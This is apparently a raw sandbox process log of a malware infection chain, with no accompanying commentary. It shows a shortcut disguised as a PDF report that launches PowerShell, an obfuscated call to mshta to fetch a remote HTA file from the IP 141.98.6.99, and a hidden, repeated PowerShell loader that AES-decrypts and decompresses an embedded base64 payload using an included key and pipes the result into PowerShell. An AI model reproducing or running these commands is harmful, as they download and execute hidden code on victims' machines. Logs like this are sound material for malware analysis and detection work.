cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "okKyvVoii" "C:\Users\test22\AppData\Local\Temp\rapport 2023 MZN Thoma.pdf.lnk"
3012powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" . C:\*i*\S*2\?sht*xe ('http' + '://141.98.6.99/thomas.hta')
2212powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $CEIapriY = 'AAAAAAAAAAAAAAAAAAAAAJ9CfG/UHnCfXjouWXYkX9h97i9plh7U+dv2DJH8W505q1UDP5PfUjmmKWHTC9aTD+gbOkmC8huQUyOCo4jDEO7AoIN2OqRHJjgTOmgCHHUG7uUY/LlPS7WT5lAjsCxbrGiML/fydP4e/LtN9gGHUNzM+f9HyH+FxNl/XpKnc6kCURRifs3s8nJ7y4cuoM+hvEhLRT71ebsK5BQmLQT+1AxeWg4TDHnvB/6AzeIxUCb6/1zOVbxfgU+M366rAVyu5imBeMa97nsG1sIVaG80VyzT0zrS1rAndYm+OBIKMeynRhALmP6q6oMUsZvz9b2Ku3tjmEszgB8RpXjoPw/PvfQC3DIYsTMxF1Or0Pz09lwsULqUmznZINEtcGT7ijksodc3JYKBnEhqo68ExY3mNeABgvmy0LWvF0QG0dbBL/iNnn67HlE53Y80IbT7fAXvGnotGWrb9WUQbk8zAbRuJDmb1w1iwzAtOh3v/p8yWes4ljpmqHi0MkW+dZ/t7V1FNeHRpySdlKwEXNYezH+SVMJU/0QKRM4X+6WFEY9Zc/fY+2SVRi6fM837ik0eWkBXnIkegWwIAcfREpJ8BFvWoMyUERK2Tga9WUiObH5wk/aEh/cHFquqHqI/r78Z8zCEsPjcRT8zfpHmGAmm/yIWVSzgp85ulUn7j2oQb33XpDaGYpLsgI+EX+DC3u/9MuIugcvrANtvs60n2ZFFD0EV0C2gxu5TCVGAqfG9Go89MSXqsCbCCwdzq7zQlk7ObosSCDCCusNHEfGP28xOzLiyThB/OWqwU6IEfhocYAW8pXHSyk2vtCdrOJI/KiGs+3f0I6B3PUhtWgLfNv4kMfRXS1caZ1h39uZHvmP9+bGvLUCLYNUP0PMF6TGtJrEUahyrd2S/jx4bnWhZ6nAySpZrG4QKx+rynmvTnROMl+Txt/VgzzKEgY6+iYhdx4gPsZUaMEMPWABNpE0bUsj9xzHfhEAsJ6eBakkmXQ7KJKyLni71/JRAaCrlhkC9UEMuEfKLDiTdUsNmr1PnAKtux6eNJi+7Tr7B5nFm/7JOYxuijdP/';$bSPpyW = 'ekxZakRPWnpvTHJXWVNiYWZQQUdaSXRhTkpHQlREUkM=';$jKElKi = New-Object 'System.Security.Cryptography.AesManaged';$jKElKi.Mode = [System.Security.Cryptography.CipherMode]::ECB;$jKElKi.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$jKElKi.BlockSize = 128;$jKElKi.KeySize = 256;$jKElKi.Key = [System.Convert]::FromBase64String($bSPpyW);$GBjSZ = [System.Convert]::FromBase64String($CEIapriY);$QGUrNraa = $GBjSZ[0..15];$jKElKi.IV = $QGUrNraa;$hOjutMgvE = $jKElKi.CreateDecryptor();$OUYRYbvlx = $hOjutMgvE.TransformFinalBlock($GBjSZ, 16, $GBjSZ.Length - 16);$jKElKi.Dispose();$wkRMyQHq = New-Object System.IO.MemoryStream( , $OUYRYbvlx );$NiVvmpo = New-Object System.IO.MemoryStream;$UzwxCPYkJ = New-Object System.IO.Compression.GzipStream $wkRMyQHq, ([IO.Compression.CompressionMode]::Decompress);$UzwxCPYkJ.CopyTo( $NiVvmpo );$UzwxCPYkJ.Close();$wkRMyQHq.Close();[byte[]] $GpQlQse = $NiVvmpo.ToArray();$ZGQWbe = [System.Text.Encoding]::UTF8.GetString($GpQlQse);$ZGQWbe | powershell - }
1196cmd.exe "C:\Windows\system32\cmd.exe" /c powershell.exe $CEIapriY = 'AAAAAAAAAAAAAAAAAAAAAJ9CfG/UHnCfXjouWXYkX9h97i9plh7U+dv2DJH8W505q1UDP5PfUjmmKWHTC9aTD+gbOkmC8huQUyOCo4jDEO7AoIN2OqRHJjgTOmgCHHUG7uUY/LlPS7WT5lAjsCxbrGiML/fydP4e/LtN9gGHUNzM+f9HyH+FxNl/XpKnc6kCURRifs3s8nJ7y4cuoM+hvEhLRT71ebsK5BQmLQT+1AxeWg4TDHnvB/6AzeIxUCb6/1zOVbxfgU+M366rAVyu5imBeMa97nsG1sIVaG80VyzT0zrS1rAndYm+OBIKMeynRhALmP6q6oMUsZvz9b2Ku3tjmEszgB8RpXjoPw/PvfQC3DIYsTMxF1Or0Pz09lwsULqUmznZINEtcGT7ijksodc3JYKBnEhqo68ExY3mNeABgvmy0LWvF0QG0dbBL/iNnn67HlE53Y80IbT7fAXvGnotGWrb9WUQbk8zAbRuJDmb1w1iwzAtOh3v/p8yWes4ljpmqHi0MkW+dZ/t7V1FNeHRpySdlKwEXNYezH+SVMJU/0QKRM4X+6WFEY9Zc/fY+2SVRi6fM837ik0eWkBXnIkegWwIAcfREpJ8BFvWoMyUERK2Tga9WUiObH5wk/aEh/cHFquqHqI/r78Z8zCEsPjcRT8zfpHmGAmm/yIWVSzgp85ulUn7j2oQb33XpDaGYpLsgI+EX+DC3u/9MuIugcvrANtvs60n2ZFFD0EV0C2gxu5TCVGAqfG9Go89MSXqsCbCCwdzq7zQlk7ObosSCDCCusNHEfGP28xOzLiyThB/OWqwU6IEfhocYAW8pXHSyk2vtCdrOJI/KiGs+3f0I6B3PUhtWgLfNv4kMfRXS1caZ1h39uZHvmP9+bGvLUCLYNUP0PMF6TGtJrEUahyrd2S/jx4bnWhZ6nAySpZrG4QKx+rynmvTnROMl+Txt/VgzzKEgY6+iYhdx4gPsZUaMEMPWABNpE0bUsj9xzHfhEAsJ6eBakkmXQ7KJKyLni71/JRAaCrlhkC9UEMuEfKLDiTdUsNmr1PnAKtux6eNJi+7Tr7B5nFm/7JOYxuijdP/';$bSPpyW = 'ekxZakRPWnpvTHJXWVNiYWZQQUdaSXRhTkpHQlREUkM=';$jKElKi = New-Object 'System.Security.Cryptography.AesManaged';$jKElKi.Mode = [System.Security.Cryptography.CipherMode]::ECB;$jKElKi.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$jKElKi.BlockSize = 128;$jKElKi.KeySize = 256;$jKElKi.Key = [System.Convert]::FromBase64String($bSPpyW);$GBjSZ = [System.Convert]::FromBase64String($CEIapriY);$QGUrNraa = $GBjSZ[0..15];$jKElKi.IV = $QGUrNraa;$hOjutMgvE = $jKElKi.CreateDecryptor();$OUYRYbvlx = $hOjutMgvE.TransformFinalBlock($GBjSZ, 16, $GBjSZ.Length - 16);$jKElKi.Dispose();$wkRMyQHq = New-Object System.IO.MemoryStream( , $OUYRYbvlx );$NiVvmpo = New-Object System.IO.MemoryStream;$UzwxCPYkJ = New-Object System.IO.Compression.GzipStream $wkRMyQHq, ([IO.Compression.CompressionMode]::Decompress);$UzwxCPYkJ.CopyTo( $NiVvmpo );$UzwxCPYkJ.Close();$wkRMyQHq.Close();[byte[]] $GpQlQse = $NiVvmpo.ToArray();$ZGQWbe = [System.Text.Encoding]::UTF8.GetString($GpQlQse);$ZGQWbe | powershell -
1564powershell.exe powershell.exe $CEIapriY = 'AAAAAAAAAAAAAAAAAAAAAJ9CfG/UHnCfXjouWXYkX9h97i9plh7U+dv2DJH8W505q1UDP5PfUjmmKWHTC9aTD+gbOkmC8huQUyOCo4jDEO7AoIN2OqRHJjgTOmgCHHUG7uUY/LlPS7WT5lAjsCxbrGiML/fydP4e/LtN9gGHUNzM+f9HyH+FxNl/XpKnc6kCURRifs3s8nJ7y4cuoM+hvEhLRT71ebsK5BQmLQT+1AxeWg4TDHnvB/6AzeIxUCb6/1zOVbxfgU+M366rAVyu5imBeMa97nsG1sIVaG80VyzT0zrS1rAndYm+OBIKMeynRhALmP6q6oMUsZvz9b2Ku3tjmEszgB8RpXjoPw/PvfQC3DIYsTMxF1Or0Pz09lwsULqUmznZINEtcGT7ijksodc3JYKBnEhqo68ExY3mNeABgvmy0LWvF0QG0dbBL/iNnn67HlE53Y80IbT7fAXvGnotGWrb9WUQbk8zAbRuJDmb1w1iwzAtOh3v/p8yWes4ljpmqHi0MkW+dZ/t7V1FNeHRpySdlKwEXNYezH+SVMJU/0QKRM4X+6WFEY9Zc/fY+2SVRi6fM837ik0eWkBXnIkegWwIAcfREpJ8BFvWoMyUERK2Tga9WUiObH5wk/aEh/cHFquqHqI/r78Z8zCEsPjcRT8zfpHmGAmm/yIWVSzgp85ulUn7j2oQb33XpDaGYpLsgI+EX+DC3u/9MuIugcvrANtvs60n2ZFFD0EV0C2gxu5TCVGAqfG9Go89MSXqsCbCCwdzq7zQlk7ObosSCDCCusNHEfGP28xOzLiyThB/OWqwU6IEfhocYAW8pXHSyk2vtCdrOJI/KiGs+3f0I6B3PUhtWgLfNv4kMfRXS1caZ1h39uZHvmP9+bGvLUCLYNUP0PMF6TGtJrEUahyrd2S/jx4bnWhZ6nAySpZrG4QKx+rynmvTnROMl+Txt/VgzzKEgY6+iYhdx4gPsZUaMEMPWABNpE0bUsj9xzHfhEAsJ6eBakkmXQ7KJKyLni71/JRAaCrlhkC9UEMuEfKLDiTdUsNmr1PnAKtux6eNJi+7Tr7B5nFm/7JOYxuijdP/';$bSPpyW = 'ekxZakRPWnpvTHJXWVNiYWZQQUdaSXRhTkpHQlREUkM=';$jKElKi = New-Object 'System.Security.Cryptography.AesManaged';$jKElKi.Mode = [System.Security.Cryptography.CipherMode]::ECB;$jKElKi.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$jKElKi.BlockSize = 128;$jKElKi.KeySize = 256;$jKElKi.Key = [System.Convert]::FromBase64String($bSPpyW);$GBjSZ = [System.Convert]::FromBase64String($CEIapriY);$QGUrNraa = $GBjSZ[0..15];$jKElKi.IV = $QGUrNraa;$hOjutMgvE = $jKElKi.CreateDecryptor();$OUYRYbvlx = $hOjutMgvE.TransformFinalBlock($GBjSZ, 16, $GBjSZ.Length - 16);$jKElKi.Dispose();$wkRMyQHq = New-Object System.IO.MemoryStream( , $OUYRYbvlx );$NiVvmpo = New-Object System.IO.MemoryStream;$UzwxCPYkJ = New-Object System.IO.Compression.GzipStream $wkRMyQHq, ([IO.Compression.CompressionMode]::Decompress);$UzwxCPYkJ.CopyTo( $NiVvmpo );$UzwxCPYkJ.Close();$wkRMyQHq.Close();[byte[]] $GpQlQse = $NiVvmpo.ToArray();$ZGQWbe = [System.Text.Encoding]::UTF8.GetString($GpQlQse);$ZGQWbe
1220powershell.exe powershell -
2564